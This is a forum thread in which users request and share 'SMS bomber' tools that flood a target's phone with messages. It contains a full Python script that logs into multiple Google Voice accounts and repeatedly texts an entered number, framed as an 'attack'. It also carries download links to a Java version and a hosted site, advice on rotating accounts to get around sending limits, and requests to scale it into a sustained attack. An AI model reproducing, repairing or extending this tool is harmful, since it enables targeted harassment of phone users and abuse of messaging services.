there used to be this program floating around that let you load up someones phone number and it would blast the fuck out of it with messages VIA webmail... does this still exist? anyone have it?
greetings, fellow internet!there used to be this program floating around that let you load up someones phone number and it would blast the fuck out of it with messages VIA webmail... does this still exist? anyone have it?
the only one i know of is 'beavers sms bomber' uses gmail to send via sms gateways, google beavers sms bomber should be able to find it pretty easily
If you search old threads I bet you can find a working script
I have a copy of MoneyBlinds SMS bomber, a year old IDK if still works but give it a shot.
http://linkthisfile.com/x/files/get/...ndom-progz.zip
The file also includes a hacking program made by a DG while ago![]()
Just tested with tmobile, still works. You will need a gmail account.
The problem is you will need to manually rotate gmail accounts as it will only allow you to send 250 per account per day. Still annoying as fuck, just sent myself 50 and my phone keeps ringing D:
I know the latest Beaver SMS bomber had multi national carrier support with account rotators, but every copy I found was infected.
that shit is nothing compared to whats out their. you want one that send out sms and calls from different providers so the phone never stops ringing or vibrating![]()
now the only problem is trying to figure out the targets carrier
lol what a useless program, and I'm sorry we don't file archive our fire![]()
Here is a python script I wrote about a year ago for this kinda thing. It uses Google Voice accounts. Just make a couple accounts and stick them in the array, then you don't have to worry about the carrier like you would using an email blaster on a phone.
import getpass
import os
import re
import sys
import urllib
import urllib2
import time
class GoogleVoiceLogin:
def __init__(self, email, password):
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor() )
urllib2.install_opener(self.opener)
self.loing_page_url = 'https://www.google.com/accounts/ServiceLogin'
self.authenticate_url = 'https://www.google.com/accounts/ServiceLoginAuth'
self.gv_home_page_url = 'https://www.google.com/voice/#inbox'
login_page_contents = self.opener.open(self.loing_page_url).read()
galx_match_obj = re.search(r'name="GALX"\s*value="([^"]+)"', login_page_contents, re.IGNORECASE)
galx_value = galx_match_obj.group(1) if galx_match_obj.group(1) is not None else ''
login_params = urllib.urlencode( {
'Email' : email,
'Passwd' : password,
'continue' : 'https://www.google.com/voice/account/signin',
'GALX': galx_value
})
self.opener.open(self.authenticate_url, login_params)
gv_home_page_contents = self.opener.open(self.gv_home_page_url).read()
key = re.search('name="_rnr_se".*?value="(.*?)"', gv_home_page_contents)
if not key:
self.logged_in = False
else:
self.logged_in = True
self.key = key.group(1)
class TextSender():
def __init__(self, opener, key):
self.opener = opener
self.key = key
self.sms_url = 'https://www.google.com/voice/sms/send/'
self.text = ''
def send_text(self, phone_number):
sms_params = urllib.urlencode({
'_rnr_se': self.key,
'phoneNumber': phone_number,
'text': self.text
})
self.response = self.opener.open(self.sms_url, sms_params).read()
def separator():
return '-' * 25
def clear_screen():
if os.name == "posix":
os.system('clear')
elif os.name in ("nt", "dos", "ce"):
os.system('CLS')
def main():
################################################## ################################################## #########
### YOU MAY ADD MORE ACCOUNTS, THERE IS NO LIMIT
ID = ['ACCOUNT1@gmail.com', 'ACCOUNT2@GMAIL.COM'] ############### REPLACE "AccountX, with 'example@gmail.com'
PASSWORD = ['PASSWORD1', 'PASSOWRD2'] ######### Set password for corresponding accounts above.
################################################## ################################################## #########
count = 0
total_bomb=0
clear_screen()
print "================================"
print''
number = raw_input("Enter a phone number to attack, please include area code: ")
clear_screen()
text = raw_input("Enter text message. Press enter when finished: ")
clear_screen()
print'Enter the number of SMS bombs, make sure the number is divisible by the number of accounts used. Otherwise it will be 1 message short.'
print''
blast = raw_input("Because you cant send a fraction of an SMS: ")
clear_screen()
print'Loading...'
blast = int(blast)
start = time.time()
while(count<len(ID)):
gv = GoogleVoiceLogin(ID[count], PASSWORD[count])
if not gv.logged_in:
clear_screen()
print 'login error on: ' ,ID[count]
sys.exit(1)
clear_screen()
print 'Successful login as: ',ID[count]
print ''
text_sender = TextSender(gv.opener, gv.key)
text_sender.text = text
print ""
bomb_count=0
while(bomb_count < (int(blast)/len(ID))):
text_sender.send_text(number)
bomb_count += 1
total_bomb+=1
clear_screen()
print"================ Work'in ================"
print''
print'Currently logged in as: ', ID[count]
print 'Sending ', total_bomb, 'of ',blast
count+=1
print''
print separator()
print'Attack Lasted', time.time() - start, 'seconds.'
print''
print''
if __name__ == "__main__":
main()
I just tried and no, no it doesn't, it looks like the login function was broken this September on the API I was using.
I wrote a Java version that still works, it only uses one account but I can change that if anyone actually wants to use an array. I just figured I'd post the python one cause people aren't usually stoked on running compiled shit from strangers. Since that is broken though, here is the .jar of my java version. If anyone cares I can post the source of this too.
http://www.megaupload.com/?d=XJE6241E
one I posted above only sent 21 when I tried to send 30, i added a pause in the send loop so that seems to have fixed it
http://www.megaupload.com/?d=HDUEYLGW
![]()
Thanks for the revised bot, have you stress tested to see how many messages this can send per IP/google account before it needs switching up?
I've sent 200 before with success but I've never actually tested it beyond that. from what I've heard 300(ish) is about the send limit per account per day. I'll have a site up with an applet to do this very soon, I'm just dealing with some bullshit with my domain right now.
http://gvbomb.com/
there we go
heh u kidz!
Cowards die many times before their actual deaths.
Someone is hitting the mobile spam hard, my girlfriend's mom and friends all fell for one.
It's working, the friends I've shared the site with promptly used it on me almost right away. It's just a basic applet with a loop calling the send SMS method from this API
http://code.google.com/p/google-voice-java/
ok so it seems like it can be a minor annoyance - next step is scaling this to all out nusiance. can steps be taken to take this furthur for some sort of a more sustained attack?
can you allow pasting in the forms so that switching up my accounts will be easier, or allow a dropdown list?
I kinda started making this for the fuck of it after I saw this thread, so its not a planned project that I can really devote a whole bunch of time to, but i'll be updating it and making it better as I can.
I plan on making it so you can use multiple accounts, gv and gmail. I'll throw up a download link to a stand alone program too. I'll probly be doing that majority of the updates on the stand alone first and then adding them to the applet later as its easier to test new shit that way. I'll post here or start a little thread of my own when I have the time to make it a little bit fancier.
Not a driveby.
Run your java console and post the output from the applet, it's way easier to troubleshoot if you have info beyond "it's not working". Also, it sounds obvious, but make sure you have a google voice account, you cant just use random gmail accounts and shit. The issue isn't with the recipients, I'm 99% sure it's with your JRE.
example of my console when I run the applet
https://www.google.com/accounts/ClientLogin - OK
Logged in to Google - Auth token received
https://www.google.com/voice/ - Moved Temporarily
https://www.google.com/voice/ - 302 - new URL: https://www.google.com/voice/b/0/
https://www.google.com/voice/b/0/ - OK
Successfully Received rnr_se.
https://www.google.com/accounts/ClientLogin - OK
Logged in to Google - Auth token received
Java Plug-in 10.2.0.13
Using JRE version 1.7.0_02-b13 Java HotSpot(TM) Client VM
https://www.google.com/accounts/ClientLogin - OK
Logged in to Google - Auth token received
https://www.google.com/voice/ - OK
Successfully Received rnr_se.
https://www.google.com/accounts/ClientLogin - OK
Logged in to Google - Auth token received
Looks like it logged in okay, so I'm assuming the GV Login syntax is username@gmail.com ? I received the "Welcome to Google Voice" message in my gmail with an assigned number.
Bookmarks